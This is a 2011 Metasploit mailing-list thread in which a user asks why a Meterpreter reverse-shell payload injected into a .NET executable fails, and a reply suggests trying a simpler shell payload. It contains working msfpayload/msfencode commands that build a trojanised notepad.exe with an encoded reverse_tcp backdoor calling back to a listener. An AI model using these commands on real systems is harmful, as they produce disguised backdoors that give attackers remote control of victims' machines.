Re: attaching meterpreter to a managed code binary

["Scott McClellan" <Scott.McClellan () tn gov>]

Your syntax looks good to me.  Have you tried another payload, maybe just a command shell?  I haven't done much with 
the .NET Framework, but have run into instances where mixing managed & unmanaged code causes problems.  
 
Could be that the relative complexity of meterpreter gives the .NET Framework heartburn.

Date: Mon, 25 Jul 2011 11:54:57 -0500
From: Jeremy <jeremy () sudosecure net>
To: framework () spool metasploit com
Subject: [framework] Attaching Meterpreter to a Managed Code Binary
like a VB.NET or C#.NET app?
Message-ID:
<CABXVT3BpqK4G=XCSLzh_ikan5NxRyb5gUw9JMt4N5HUh5G_zDA () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1

Anyone ever try attaching a meterpreter backdoor payload to a managed
code binary generated from something like VB.net? ?I can attach
meterpreter to a native binary like this all day long:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=80
R | msfencode -x notepad.exe -k -o notepad_new.exe -e
x86/shikata_ga_nai -c 10 -t exe

But lets say the managed code .NET app is called "vbapp.exe" I try this command:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=80
R | msfencode -x vbapp.exe -k -o vbapp_new.exe -e x86/shikata_ga_nai
-c 10 -t exe

and it fails to execute on the victim machine. ?It raises an exemption
with "The application failed to initialize properly. (0xc000007b).
Click ok to terminate the application."

Anyways thought I would ask before I started stepping through the
process just in case someone spotted a issue with my syntax or has
done this before and has a work around. ?;)

Thanks in advance for any advice and/or help.

--jeremy

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework